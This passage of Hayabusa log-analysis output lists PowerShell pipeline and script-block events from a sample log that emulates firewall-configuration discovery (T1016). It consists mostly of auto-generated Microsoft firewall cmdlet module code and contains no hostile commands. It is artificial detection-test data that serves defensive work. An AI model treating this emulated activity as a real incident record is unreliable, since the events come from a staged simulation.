$__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceFilter'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.864 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.864 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.864 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.864 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.864 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallInterfaceFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.864 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallInterfaceFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.864 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.864 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.864 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${InterfaceAlias}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.864 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallInterfaceTypeFilter ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.864 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceTypeFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType[]] ${InterfaceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('InterfaceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InterfaceType}) $__cmdletization_queryBuilder.FilterByProperty('InterfaceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceTypeFilter' function Set-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceTypeFilter'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; 